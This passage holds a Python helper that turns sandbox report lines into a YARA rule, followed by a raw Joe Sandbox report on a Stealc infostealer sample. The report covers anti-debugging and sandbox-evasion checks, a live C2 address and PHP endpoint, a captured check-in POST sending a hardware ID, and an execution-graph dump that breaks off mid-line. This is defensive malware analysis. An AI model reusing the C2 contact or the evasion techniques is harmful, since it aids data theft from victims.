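    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14EAB second address: C14EB5 instructions: 0x00000000 rdtsc 0x00000002 js 00007EFD6CDBF896h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14EB5 second address: C14EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc",
]


def parse_line(line):
    """Return (source, signature, detail) or None for lines of another kind."""
    m = LINE_RE.match(line)
    return (m.group("source"), m.group("sig"), m.group("detail")) if m else None


def summarize(lines):
    """Group parsed lines by the kind of check the sample performed."""
    out = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        _, sig, detail = parsed
        if sig == "RDTSC instruction interceptor":
            m = RDTSC_RE.search(detail)
            if m:
                out["rdtsc_pairs"].append((int(m.group(1), 16), int(m.group(2), 16)))
        elif sig == "Open window title or class name":
            out["window_names"].append(detail)
        elif sig == "File opened":
            out["device_names"].append(detail)          # SoftICE \\.\<name> devices
        elif sig == "Registry key queried":
            key, _, name = detail.partition(" name: ")
            out["registry_values"].append((key, name))
        elif sig == "Process queried":
            out["process_info_classes"].append(detail)  # NtQueryInformationProcess
        elif sig == "Thread information set":
            out["thread_info_classes"].append(detail)   # NtSetInformationThread
    return dict(out)


def yara_strings(summary, rule_name="stealc_protector_antianalysis_strings"):
    """Window class names and debugger device names are specific enough to hunt
    on; BIOS/driver registry value names are read by benign software too and
    are left out.  Rule name and condition are assumptions."""
    strings = sorted(set(summary.get("window_names", []) + summary.get("device_names", [])))
    body = [f"rule {rule_name}", "{", "    strings:"]
    for i, s in enumerate(strings):
        esc = s.replace("\\", "\\\\").replace('"', '\\"')
        body.append(f'        $s{i} = "{esc}" ascii wide nocase')
    body += ["    condition:", f"        {min(3, len(strings))} of them", "}"]
    return "\n".join(body)


if __name__ == "__main__":
    s = summarize(REPORT_LINES)
    print(f"{len(s['rdtsc_pairs'])} rdtsc pairs, first at 0x{s['rdtsc_pairs'][0][0]:X}")
    print("registry values read:", [name for _, name in s["registry_values"]])
    print("sandbox must hide:", s["window_names"] + s["device_names"])
    print(yara_strings(s))
```

Feeding the whole report export through summarize() gives the full list of window classes, devices and registry values, which is the set a sandbox image has to hide for this protector, while the rdtsc pair addresses show how densely the protector spreads its timing checks across the unpacked code.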

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 6396, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00719790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00719790
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007198E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_007198E0
Source: file.exe, file.exe, 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: _Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007475A8 cpuid 0_2_007475A8
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00717D20
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00717B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00717B10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007179E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_007179E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00717BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00717BC0

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2097264497.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6396, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2097264497.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6396, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
                MITRE ATT&CK Matrix

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | DLL Side-Loading (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Native API (12) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (33) | LSASS Memory | Security Software Discovery (641) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Virtualization/Sandbox Evasion (33) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Process Discovery (13) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (3) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (12) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (334) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label | Link
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/6c4adf523b719729.php | true | | unknown
                http://185.215.113.206/ | true | | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/6c4adf523b719729.php2 | file.exe, 00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/6c4adf523b719729.php/ | file.exe, 00000000.00000002.2138292693.0000000001218000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206 | file.exe, 00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.206/ws | file.exe, 00000000.00000002.2138292693.0000000001218000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/6c4adf523b719729.phphc_ | file.exe, 00000000.00000002.2138292693.0000000001218000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2097264497.0000000004D5B000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                185.215.113.206 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1544422
                                Start date and time:2024-10-29 12:03:09 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 31s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:2
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 20
                                • Number of non-executed functions: 129
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated
                                • Exclude process from analysis (whitelisted): dllhost.exe
                                • Excluded IPs from analysis (whitelisted): 4.245.163.56
                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                • VT rate limit hit for: file.exe
                                No simulations
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                185.215.113.206 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Quasar, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                bg.microsoft.map.fastly.net | Jo Smalley shared _Harbour Healthcare Ltd Project_ with you..eml | Get hash | malicious | HTMLPhisher | Browse | 199.232.214.172
                | Jo Smalley shared _Harbour Healthcare Ltd Project_ with you..eml | Get hash | malicious | HTMLPhisher | Browse | 199.232.214.172
                | https://www.google.mx/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Biw.%C2%ADgc%C2%ADrvn%C2%ADm0.%C2%ADza%C2%AD.c%E2%80%8Bo%C2%ADm%2Ffylee%2Fimages%2Fsf_rand_string_mixed(24)/toto@dgtresor.gouv.fr | Get hash | malicious | Unknown | Browse | 199.232.210.172
                | Kvidistante.vbs | Get hash | malicious | GuLoader | Browse | 199.232.210.172
                | https://pub-75eadb7757ac4bf2ab3de7c52d2a4895.r2.dev/index.html#'+tFjvjBPh,document%5B'body'%5D%5B'appendChild'%5D(para) | Get hash | malicious | HTMLPhisher | Browse | 199.232.210.172
                | https://clairecarpenter.com/wp-includes/css/pbcmc.php?7112797967704b536932307466507a4373757943784b5463314a54533470796b784f7a456e567130725553383750315338317430677031416341#Email# | Get hash | malicious | HTMLPhisher | Browse | 199.232.214.172
                | https://ws.onehub.com/files/3wbmh4dn | Get hash | malicious | Unknown | Browse | 199.232.210.172
                | uR1MVCwDco.exe | Get hash | malicious | AsyncRAT | Browse | 199.232.214.172
                | http://prabal-gupta-lcatterton-com.athuselevadores.com.br/ | Get hash | malicious | HTMLPhisher | Browse | 199.232.210.172
                | https://api.inspectrealestate.com.au/email/track?eta=1&t=B32-5UARLGTXC6GHXC7PJPHCGUP7HMF6FJEQ76L6MOL7WYB6P6EYQNBONANBBGKOXFRO3HPDET5TXGOZXG5FJNMJJC437YUYUWDF5VEVIWPK6LECEZJV3OMRCXF6VI76ZOGYOFIOERVACTHYB4KHK22IKKEWLYPTUBLONXLA7QVY2SW2TZMW4ULVG2UAKDR3DM3RL4TTJAF3F3ROXQ3ZLRVYS7Z2T4TIQETEEUV73V42AQLF65YKSUX6JMYEW3ZHXPREAMXXBOQV32GKOYOISFZKX4GPTPR2IMSMCULLR2V4QUSMU3MWF7NQ%3D%3D%3D%3D | Get hash | malicious | Unknown | Browse | 199.232.214.172
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
                | file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
                | file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
                | file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
                | file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
                | file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
                                No context
                                No context
                                No created / dropped files found
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.961505490272384
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:2'155'008 bytes
                                MD5:345e2a6577340e9722715c9a42736169
                                SHA1:48ebfe09a9482f6289a7db2523594bab4d600a08
                                SHA256:1b8052833a2230173369c09749f616b2bf4812983ed541d803f24afdfb01caa0
                                SHA512:a50768ccdb728d186b22cbf2980ce2ef167068d2a7092e9f0490498b31c73237a87399d2c7bc97ee3c88b821f61040c4d657648d912ddf22b79de0f0f0191bd0
                                SSDEEP:49152:GaFRDFSBDo/ljX/AFA03YPEYXhIYE4h8dvHW6gjkDW5XF0E:hg8jYeVEVYE4uAEi1
                                TLSH:ECA533320BA397A4FF7581B674E952D539AA7FE061D8013B87503219D32FF24B7AAC05
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                                Icon Hash:00928e8e8686b000
                                Entrypoint:0xb35000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                (unnamed) | 0x1000 | 0x2e7000 | 0x67600 | 84e8606ef291cd3a0140a312da7c7391 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                (unnamed) | 0x2ea000 | 0x2a6000 | 0x200 | a840fefc2c05f33ec940f05dd6a93c7b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                oqzwigwm | 0x590000 | 0x1a4000 | 0x1a3200 | 3280e4a57db03400242d0e9a46e5a16c | False | 0.9946159456084104 | data | 7.953066845220626 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                bpeuitit | 0x734000 | 0x1000 | 0x400 | 8cf4daad08f8e74a2dfdf1189a918ae0 | False | 0.81640625 | data | 6.3463886427381135 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant | 0x735000 | 0x3000 | 0x2200 | b1c5e8a9b17da08f97b073e9f70b70d9 | False | 0.06640625 | DOS executable (COM) | 0.8099158379481108 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                DLL | Import
                kernel32.dll | lstrcpy
                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                2024-10-29T12:04:12.693723+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Oct 29, 2024 12:04:11.424648046 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                Oct 29, 2024 12:04:11.430066109 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                Oct 29, 2024 12:04:11.430154085 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                Oct 29, 2024 12:04:11.430305958 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                Oct 29, 2024 12:04:11.435573101 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                Oct 29, 2024 12:04:12.346601963 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                Oct 29, 2024 12:04:12.346673965 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                Oct 29, 2024 12:04:12.402441978 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                Oct 29, 2024 12:04:12.408056021 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                Oct 29, 2024 12:04:12.693645000 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                Oct 29, 2024 12:04:12.693722963 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                Oct 29, 2024 12:04:16.112713099 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                Oct 29, 2024 12:04:24.071999073 CET | 1.1.1.1 | 192.168.2.5 | 0x2df6 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                Oct 29, 2024 12:04:24.071999073 CET | 1.1.1.1 | 192.168.2.5 | 0x2df6 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                                • 185.215.113.206
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | 6396 | C:\Users\user\Desktop\file.exe
                Timestamp | Bytes transferred | Direction | Data
                Oct 29, 2024 12:04:11.430305958 CET | 90 | OUT | GET / HTTP/1.1
                                Host: 185.215.113.206
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                Oct 29, 2024 12:04:12.346601963 CET | 203 | IN | HTTP/1.1 200 OK
                                Date: Tue, 29 Oct 2024 11:04:12 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                Oct 29, 2024 12:04:12.402441978 CET | 413 | OUT | POST /6c4adf523b719729.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIE
                                Host: 185.215.113.206
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 30 34 32 38 36 45 35 31 36 39 33 31 39 36 39 33 34 38 38 31 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 2d 2d 0d 0a
                                Data Ascii: ------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="hwid"9404286E51693196934881------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="build"tale------HCAFIJDGHCBFHJKFCGIE--
                Oct 29, 2024 12:04:12.693645000 CET | 210 | IN | HTTP/1.1 200 OK
                                Date: Tue, 29 Oct 2024 11:04:12 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=


                                Target ID:0
                                Start time:07:04:05
                                Start date:29/10/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0x700000
                                File size:2'155'008 bytes
                                MD5 hash:345E2A6577340E9722715C9A42736169
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2097264497.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true


                                  Execution Graph

                                  Execution Coverage:3.1%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:2.9%
                                  Total number of Nodes:1330
                                  Total number of Limit Nodes:24
                                  execution_graph: [node/edge dump of the rendered execution graph, starting at node 716c90 (entry) and continuing through 702... / 704610 string-construction nodes, 719bb0 (GetPEB, LoadLibraryA, GetProcAddress resolution), 7011d0 (GetSystemInfo, VirtualAllocExNuma, GlobalMemoryStatusEx, ExitProcess checks), 716a10 (GetUserDefaultLangID with ExitProcess branches), 716bc0 (GetSystemTime, sscanf, SystemTimeToFileTime), 716d62 (OpenEventA / CreateEventA / CloseHandle / Sleep) and 719f20 (further GetProcAddress resolution). Graph data truncated.]
API calls 38891->38892 38893 71a72f 38891->38893 38892->38893 38894 71a7b2 38893->38894 38895 71a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38893->38895 38896 71a7bb GetProcAddress GetProcAddress 38894->38896 38897 71a7ec 38894->38897 38895->38894 38896->38897 38898 71a825 38897->38898 38899 71a7f5 GetProcAddress GetProcAddress 38897->38899 38900 71a922 38898->38900 38901 71a832 10 API calls 38898->38901 38899->38898 38902 71a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38900->38902 38903 71a98d 38900->38903 38901->38900 38902->38903 38904 71a996 GetProcAddress 38903->38904 38905 71a9ae 38903->38905 38904->38905 38906 71a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38905->38906 38907 715ef3 38905->38907 38906->38907 38908 701590 38907->38908 39178 7016b0 38908->39178 38911 71aab0 lstrcpy 38912 7015b5 38911->38912 38913 71aab0 lstrcpy 38912->38913 38914 7015c7 38913->38914 38915 71aab0 lstrcpy 38914->38915 38916 7015d9 38915->38916 38917 71aab0 lstrcpy 38916->38917 38918 701663 38917->38918 38919 715760 38918->38919 38920 715771 38919->38920 38921 71ab30 2 API calls 38920->38921 38922 71577e 38921->38922 38923 71ab30 2 API calls 38922->38923 38924 71578b 38923->38924 38925 71ab30 2 API calls 38924->38925 38926 715798 38925->38926 38927 71aa50 lstrcpy 38926->38927 38928 7157a5 38927->38928 38929 71aa50 lstrcpy 38928->38929 38930 7157b2 38929->38930 38931 71aa50 lstrcpy 38930->38931 38932 7157bf 38931->38932 38933 71aa50 lstrcpy 38932->38933 38971 7157cc 38933->38971 38934 701590 lstrcpy 38934->38971 38935 715510 25 API calls 38935->38971 38936 715893 StrCmpCA 38936->38971 38937 7158f0 StrCmpCA 38938 715a2c 38937->38938 38937->38971 38939 71abb0 lstrcpy 38938->38939 38940 715a38 38939->38940 38941 71ab30 2 API calls 38940->38941 38942 715a46 38941->38942 38944 71ab30 2 API calls 38942->38944 38943 715aa6 StrCmpCA 38945 715be1 38943->38945 38943->38971 38949 715a55 38944->38949 38948 71abb0 
